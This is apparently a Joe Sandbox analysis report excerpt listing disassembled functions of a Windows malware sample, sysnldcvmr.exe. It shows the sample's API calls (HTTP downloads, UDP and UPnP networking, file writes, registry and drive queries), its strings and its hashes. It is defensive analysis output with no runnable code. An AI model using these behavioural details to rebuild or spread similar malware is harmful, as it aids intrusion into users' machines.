                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 394 40ea30-40ea54 InternetOpenA 395 40ea56-40ea73 InternetOpenUrlA 394->395 396 40eac8-40ead9 Sleep 394->396 397 40ea75-40ea9c HttpQueryInfoA 395->397 398 40eabe-40eac2 InternetCloseHandle 395->398 399 40eab4-40eab8 InternetCloseHandle 397->399 400 40ea9e-40eaa6 397->400 398->396 399->398 400->399 401 40eaa8-40eab0 400->401 401->399
                                                                                                                    APIs
                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                    Strings
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                    Function 0040AB80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\tbtnds.dat, xrefs: 0040AC13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                    • String ID: C:\Users\user\tbtnds.dat
                                                                                                                    • API String ID: 442028454-3213863656
                                                                                                                    • Opcode ID: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                    • Opcode Fuzzy Hash: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                    • String ID: %s%s
                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2251373460-0
                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                    • Opcode ID: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                    • Opcode Fuzzy Hash: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                    Function 00406FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysnldcvmr.exe), ref: 00406FF3
                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                    Strings
                                                                                                                    • C:\Windows\sysnldcvmr.exe, xrefs: 00406FEE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                    • String ID: C:\Windows\sysnldcvmr.exe
                                                                                                                    • API String ID: 459949847-3906355863
                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                    • String ID: \??\
                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3980219359-0
                                                                                                                    • Opcode ID: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                    • Opcode Fuzzy Hash: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                    • Opcode ID: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                    • Opcode Fuzzy Hash: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                    • String ID: TCP$UDP
                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                    Function 0040CAD0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CB11
                                                                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040CC14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2813130747-0
                                                                                                                    • Opcode ID: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                                                                    • Instruction ID: 83670a342839083162ad58e3b7d5d9bbd8ac0fe46ad26882e5e5984df89c7db9
                                                                                                                    • Opcode Fuzzy Hash: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                                                                    • Instruction Fuzzy Hash: EB41C5B5E00204FBDF00EB94E885BAF77755B04304F148669F505BB2C2D639E94187A9
                                                                                                                    Function 0040B480 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(Twizt,0040D5B8,0040D5B8,?,?,0040D5B8,00000000,0040D5B8,0040D5B8,00000000,00000000), ref: 0040B4CC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: Twizt$Twizt
                                                                                                                    • API String ID: 1659193697-16428492
                                                                                                                    • Opcode ID: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                                                                    • Instruction ID: a71c0bccabe8f3fb080a23dd90b4eb14de59e01fcd2b7b8bcad4b0800539831b
                                                                                                                    • Opcode Fuzzy Hash: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                                                                    • Instruction Fuzzy Hash: 181124B5900108BFCB04DF98D841E9EB7B5EF48308F14C1A9FD19AB342D635EA10CBA5
                                                                                                                    Function 0040CDC0 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
                                                                                                                    • htons.WS2_32(00009E34), ref: 0040CE05
                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F
                                                                                                                      • Part of subcall function 0040AB40: shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                                                                      • Part of subcall function 0040AB40: closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
